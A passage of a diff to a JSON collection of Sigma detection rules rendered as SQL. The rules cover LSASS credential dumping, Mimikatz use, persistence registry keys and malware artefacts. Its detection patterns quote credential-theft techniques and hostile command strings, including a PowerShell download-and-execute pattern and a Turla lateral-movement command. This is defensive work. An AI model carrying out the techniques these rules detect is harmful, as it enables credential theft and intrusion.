'C07FDDD21D123EA9B3A08EEF44AAAC45'))" + "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '0x40%' ESCAPE '\\' OR GrantedAccess LIKE '0x100000%' ESCAPE '\\' OR GrantedAccess LIKE '0x1410%' ESCAPE '\\' OR GrantedAccess LIKE '0x1438%' ESCAPE '\\' OR GrantedAccess LIKE '0x143a%' ESCAPE '\\' OR GrantedAccess LIKE '0x1418%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f0fff%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f1fff%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f2fff%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f3fff%' ESCAPE '\\')) AND NOT (((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskmgr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\perfmon.exe' ESCAPE '\\')) OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') AND GrantedAccess IN ('0x1410', '0x410')) OR ((SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' OR 
SourceImage LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Security Client\\\\MsMpEng.exe%' ESCAPE '\\') AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND CallTrace LIKE '%|C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Definition Updates\\\\{%' ESCAPE '\\' AND CallTrace LIKE '%}\\\\mpengine.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1418') OR ((CallTrace LIKE '%|c:\\\\program files\\\\windows defender\\\\mprtp.dll%' ESCAPE '\\' OR CallTrace LIKE '%|c:\\\\program files\\\\windows defender\\\\MpClient.dll%' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\GamingServices.exe' ESCAPE '\\' AND GrantedAccess IN ('0x1410', '0x410')) OR ((SourceImage LIKE '%\\\\PROCEXP64.EXE' ESCAPE '\\' OR SourceImage LIKE '%\\\\PROCEXP.EXE' ESCAPE '\\' OR SourceImage LIKE '%C:\\\\WINDOWS\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\MBAMInstallerService.exe' ESCAPE '\\') AND GrantedAccess IN ('0x1410', '0x410', '0x40')) OR ((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\wbem\\\\wmiprvse.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') AND GrantedAccess IN ('0x1410', '0x410', '0x1f1fff', '0x1f3fff')) OR ((SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\wininit.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\') AND GrantedAccess = '0x1000000') OR (SourceImage LIKE 'C:\\\\ProgramData\\\\VMware\\\\VMware Tools\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess IN ('0x100000', '0x1410')) OR ((SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor64.exe' 
ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\') AND GrantedAccess IN ('0x40', '0x1010')) OR (SourceImage LIKE '%\\\\explorer.exe' ESCAPE '\\' AND GrantedAccess = '0x401') OR (SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\MRT.exe' ESCAPE '\\' AND GrantedAccess IN ('0x1410', '0x1418')) OR (GrantedAccess = '0x40' AND (SourceImage LIKE '%\\\\handle.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\handle64.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\Installer\\\\setup.exe' ESCAPE '\\') OR (SourceImage LIKE '%\\\\AppData\\\\Local\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' AND GrantedAccess = '0x401') OR (SourceImage LIKE 'C:\\\\PROGRAMDATA\\\\MALWAREBYTES\\\\MBAMSERVICE\\\\ctlrupdate\\\\mbupdatr.exe' ESCAPE '\\' AND GrantedAccess = '0x1410') OR ((SourceImage LIKE '%:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') AND SourceImage LIKE '%.tmp\\\\DropboxUpdate.exe' ESCAPE '\\' AND GrantedAccess IN ('0x410', '0x1410')) OR (SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MSBuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' AND GrantedAccess = '0x1F3FFF') OR (SourceImage LIKE '%\\\\SteamLibrary\\\\steamapps\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_nimgrab.yml" + "filename": "proc_access_win_cred_dump_lsass_access.yml" }, { - "title": "Renamed MegaSync Execution", - "id": "643bdcac-8b82-49f4-9fd9-25a90b929f3b", + "title": "WerFault Accassing LSASS", + "id": "e5b33f7d-eb93-48b6-9851-09e1e610b6d7", "status": "test", - "description": "Detects the execution of a renamed MegaSync.exe as seen used by ransomware families like Nefilim, Sodinokibi, Pysa, and Conti.", - "author": "Sittikorn S", + "description": "Detects process LSASS memory dump using Mimikatz, NanoDump, 
Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "Software that illegally integrates MegaSync in a renamed form", - "Administrators that have renamed MegaSync" + "Actual failures in lsass.exe that trigger a crash dump (unlikely)", + "Unknown cases in which WerFault accesses lsass.exe" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'megasync.exe' AND NOT (NewProcessName LIKE '%\\\\megasync.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (SourceImage LIKE '%\\\\WerFault.exe' ESCAPE '\\' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF')" ], - "filename": "proc_creation_win_renamed_megasync.yml" + "filename": "proc_access_win_lsass_werfault.yml" }, { - "title": "Turla Group Lateral Movement", - "id": "c601f20d-570a-4cde-a7d6-e17f99cb8e7f", - "status": "test", - "description": "Detects automated lateral movement by Turla group", - "author": "Markus Neis", + "title": "Suspicious LSASS Access Via MalSecLogon", + "id": "472159c5-31b9-4f56-b794-b766faa8b0a7", + "status": "experimental", + "description": "Detects suspicious access to Lsass handle via a call trace to \"seclogon.dll\"", + "author": "Samir Bousseaden (original elastic rule), Nasreddine Bencherchali (sigma)", "tags": [ - "attack.g0010", - "attack.execution", - "attack.t1059", - "attack.lateral_movement", - "attack.t1021.002", - "attack.discovery", - "attack.t1083", - "attack.t1135" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE 'net use 
\\\\\\\\\\%DomainController\\%\\\\C$ \"P@ssw0rd\" %' ESCAPE '\\' OR CommandLine LIKE 'dir c:\\\\%.doc% /s' ESCAPE '\\' OR CommandLine LIKE 'dir \\%TEMP\\%\\\\%.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess = '0x14c0' AND CallTrace LIKE '%seclogon.dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_turla_commands_critical.yml" + "filename": "proc_access_win_susp_seclogon.yml" }, { - "title": "Allow Service Access Using Security Descriptor Tampering Via Sc.EXE", - "id": "6c8fbee5-dee8-49bc-851d-c3142d02aa47", - "status": "experimental", - "description": "Detects suspicious DACL modifications to allow access to a service from a suspicious trustee. This can be used to override access restrictions set by previous ACLs.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "LSASS Access from White-Listed Processes", + "id": "4be8b654-0c01-4c9d-a10c-6b28467fc651", + "status": "test", + "description": "Detects a possible process memory dump that uses the white-listed filename like TrolleyExpress.exe as a way to dump the lsass process memory without Microsoft Defender interference", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1543.003" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "Unknown" + "Unlikely, since these tools shouldn't access lsass.exe at all" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '%sdset%' ESCAPE '\\' AND CommandLine LIKE '%A;%' ESCAPE '\\') AND (CommandLine LIKE '%;IU%' ESCAPE '\\' OR CommandLine LIKE '%;SU%' ESCAPE '\\' OR CommandLine LIKE '%;BA%' ESCAPE '\\' OR CommandLine LIKE '%;SY%' ESCAPE '\\' OR CommandLine LIKE '%;WD%' ESCAPE '\\'))" + "SELECT * FROM 
logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (SourceImage LIKE '%\\\\TrolleyExpress.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\ProcessDump.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\dump64.exe' ESCAPE '\\') AND (GrantedAccess LIKE '%10' ESCAPE '\\' OR GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\' OR GrantedAccess LIKE '%FF' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sc_sdset_allow_service_changes.yml" + "filename": "proc_access_win_lsass_memdump_evasion.yml" }, { - "title": "Suspicious Remote Child Process From Outlook", - "id": "e212d415-0e93-435f-9e1a-f29005bb4723", - "status": "test", - "description": "Detects a suspicious child process spawning from Outlook where the image is located in a remote location (SMB/WebDav shares).", - "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems)", + "title": "Mimikatz through Windows Remote Management", + "id": "aa35a627-33fb-4d04-a165-d33b4afca3e8", + "status": "stable", + "description": "Detects usage of mimikatz through WinRM protocol by monitoring access to lsass process by 
wsmprovhost.exe.", + "author": "Patryk Prauze - ING Tech", "tags": [ + "attack.credential_access", "attack.execution", - "attack.t1059", - "attack.t1202" + "attack.t1003.001", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.006", + "attack.s0002" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' AND NewProcessName LIKE '\\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\wsmprovhost.exe' ESCAPE '\\') AND NOT (GrantedAccess = '0x80000000'))" ], - "filename": "proc_creation_win_office_outlook_susp_child_processes_remote.yml" + "filename": "proc_access_win_mimikatz_trough_winrm.yml" }, { - "title": "Invoke-Obfuscation Via Stdin", - "id": "9c14c9fa-1a63-4a64-8e57-d19280559490", - "status": "test", - "description": "Detects Obfuscated Powershell via Stdin in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "LittleCorporal Generated Maldoc Injection", + "id": "7bdde3bf-2a42-4c39-aa31-a92b3e17afac", + "status": "experimental", + "description": "Detects the process injection of a LittleCorporal generated Maldoc.", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.t1204.002", + "attack.t1055.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND (CommandLine LIKE '%environment%' ESCAPE '\\' OR CommandLine LIKE '%invoke%' ESCAPE '\\' OR CommandLine LIKE '%input%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (SourceImage LIKE '%\\\\winword.exe' ESCAPE '\\' AND CallTrace LIKE 
'%:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v2.%' ESCAPE '\\' AND CallTrace LIKE '%UNKNOWN%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_via_stdin.yml" + "filename": "proc_access_win_littlecorporal_generated_maldoc.yml" }, { - "title": "Security Privileges Enumeration Via Whoami.EXE", - "id": "97a80ec7-0e2f-4d05-9ef4-65760e634f6b", + "title": "Lsass Memory Dump via Comsvcs DLL", + "id": "a49fa4d5-11db-418c-8473-1e014a8dd462", + "status": "test", + "description": "Detects adversaries leveraging the MiniDump export function from comsvcs.dll via rundll32 to perform a memory dump from lsass.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ], + "falsepositives": [ + "Unknown" + ], + "level": "critical", + "rule": [ + "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\rundll32.exe' ESCAPE '\\' AND CallTrace LIKE '%comsvcs.dll%' ESCAPE '\\')" + ], + "filename": "proc_access_win_lsass_dump_comsvcs_dll.yml" + }, + { + "title": "Potential Credential Dumping Attempt Via PowerShell", + "id": "0f920ebe-7aea-4c54-b202-9aa0c609cfe5", "status": "experimental", - "description": "Detects a whoami.exe executed with the /priv command line flag instructing the tool to show all current user privileges. 
This is often used after a privilege escalation attempt.", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects PowerShell processes requesting access to \"lsass.exe\"", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.privilege_escalation", - "attack.discovery", - "attack.t1033" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND (CommandLine LIKE '% /priv%' ESCAPE '\\' OR CommandLine LIKE '% -priv%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_whoami_priv_discovery.yml" + "filename": "proc_access_win_winapi_in_powershell_credentials_dumping.yml" }, { - "title": "Suspicious Process Created Via Wmic.EXE", - "id": "3c89a1e8-0fba-449e-8f1b-8409d6267ec8", + "title": "Potential Persistence Via Logon Scripts - Registry", + "id": "9ace0707-b560-49b8-b6ca-5148b42f39fb", "status": "test", - "description": "Detects WMIC executing \"process call create\" with suspicious calls to processes such as \"rundll32\", \"regsrv32\", etc.", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects creation of UserInitMprLogonScript persistence method", + "author": "Tom Ueltschi (@c_APT_ure)", "tags": [ - "attack.execution", - "attack.t1047" + "attack.t1037.001", + "attack.persistence", + "attack.lateral_movement" ], "falsepositives": [ - "Unknown" + "Exclude legitimate logon scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%process %' ESCAPE '\\' AND CommandLine LIKE '%call %' ESCAPE '\\' AND 
CommandLine LIKE '%create %' ESCAPE '\\' AND (CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%bitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%comspec\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%localappdata\\%%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'CreateKey' AND TargetObject LIKE '%UserInitMprLogonScript%' ESCAPE '\\')" ], - "filename": "proc_creation_win_wmic_susp_process_creation.yml" + "filename": "registry_add_persistence_logon_scripts_userinitmprlogonscript.yml" }, { - "title": "Suspicious TSCON Start as SYSTEM", - "id": "9847f263-4a81-424f-970c-875dab15b79b", + "title": "Suspicious Execution Of Renamed Sysinternals Tools - Registry", + "id": "f50f3c09-557d-492d-81db-9064a8d4e211", "status": "experimental", - "description": "Detects a tscon.exe start as LOCAL SYSTEM", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the creation of the 
\"accepteula\" key related to the Sysinternals tools being created from executables with the wrong name (e.g. a renamed Sysinternals tool)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.resource_development", + "attack.t1588.002" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\tscon.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'CreateKey' AND (TargetObject LIKE '%\\\\Active Directory Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Handle%' ESCAPE '\\' OR TargetObject LIKE '%\\\\LiveKd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ProcDump%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Process Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsExec%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoggedon%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoglist%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPasswd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPing%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsService%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SDelete%' ESCAPE '\\') AND TargetObject LIKE '%\\\\EulaAccepted' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ADExplorer64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\handle.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\handle64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\livekd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\livekd64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' 
OR NewProcessName LIKE '%\\\\PsExec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsExec64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsLoggedon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsLoggedon64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psloglist.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psloglist64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pspasswd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pspasswd64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsPing.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsPing64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsService.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsService64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sdelete.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_tscon_localsystem.yml" + "filename": "registry_add_pua_sysinternals_renamed_execution_via_eula.yml" }, { - "title": "Operator Bloopers Cobalt Strike Modules", - "id": "4f154fb6-27d1-4813-a759-78b93e0b9c48", - "status": "experimental", - "description": "Detects Cobalt Strike module/commands accidentally entered in CMD shell", - "author": "_pete_0, TheDFIRReport", + "title": "Potential Ursnif Malware Activity - Registry", + "id": "21f17060-b282-4249-ade0-589ea3591558", + "status": "test", + "description": "Detects registry keys related to Ursnif malware.", + "author": "megan201296", "tags": [ "attack.execution", - "attack.t1059.003" + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'Cmd.Exe' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ShareFinder%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Kerberoast%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SMBAutoBrute%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR CommandLine LIKE '%zerologon%' ESCAPE '\\' OR CommandLine LIKE '%av\\_query%' 
ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'CreateKey' AND TargetObject LIKE '%\\\\Software\\\\AppDataLow\\\\Software\\\\Microsoft\\\\%' ESCAPE '\\') AND NOT ((TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\RepService\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\IME\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\AppDataLow\\\\Software\\\\Microsoft\\\\Edge\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_cobaltstrike_bloopers_modules.yml" + "filename": "registry_add_malware_ursnif.yml" }, { - "title": "Renamed Plink Execution", - "id": "1c12727d-02bf-45ff-a9f3-d49806a3cf43", + "title": "Potential Persistence Via New AMSI Providers - Registry", + "id": "33efc23c-6ea2-4503-8cfe-bdf82ce8f705", "status": "experimental", - "description": "Detects the execution of a renamed version of the Plink binary", + "description": "Detects when an attacker registers a new AMSI provider in order to achieve persistence", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Legitimate security products adding their own AMSI providers. 
Filter these according to your environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'Plink' OR (CommandLine LIKE '% -l forward%' ESCAPE '\\' AND CommandLine LIKE '% -P %' ESCAPE '\\' AND CommandLine LIKE '% -R %' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\plink.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'CreateKey' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\AMSI\\\\Providers\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\WOW6432Node\\\\Microsoft\\\\AMSI\\\\Providers\\\\%' ESCAPE '\\')) AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_renamed_plink.yml" + "filename": "registry_add_persistence_amsi_providers.yml" }, { - "title": "Suspicious PowerShell Download and Execute Pattern", - "id": "e6c54d94-498c-4562-a37c-b469d8e9a275", + "title": "Potential NetWire RAT Activity - Registry", + "id": "1d218616-71b0-4c40-855b-9dbe75510f7f", "status": "experimental", - "description": "Detects suspicious PowerShell download patterns that are often used in malicious scripts, stagers or downloaders (make sure that your backend applies the strings case-insensitive)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects registry keys related to NetWire RAT", + "author": "Christopher Peacock", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Software installers that pull packages from remote systems and execute them" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%IEX 
((New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%IEX (New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%IEX((New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%IEX(New-Object Net.WebClient).DownloadString%' ESCAPE '\\' OR CommandLine LIKE '% -command (New-Object System.Net.WebClient).DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '% -c (New-Object System.Net.WebClient).DownloadFile(%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'New registry value created' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'CreateKey' AND TargetObject LIKE '%\\\\software\\\\NetWire%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_susp_download_patterns.yml" + "filename": "registry_add_malware_netwire.yml" }, { - "title": "Potential CVE-2021-41379 Exploitation Attempt", - "id": "af8bbce4-f751-46b4-8d91-82a33a736f61", - "status": "test", - "description": "Detects potential exploitation attempts of CVE-2021-41379 (InstallerFileTakeOver), a local privilege escalation (LPE) 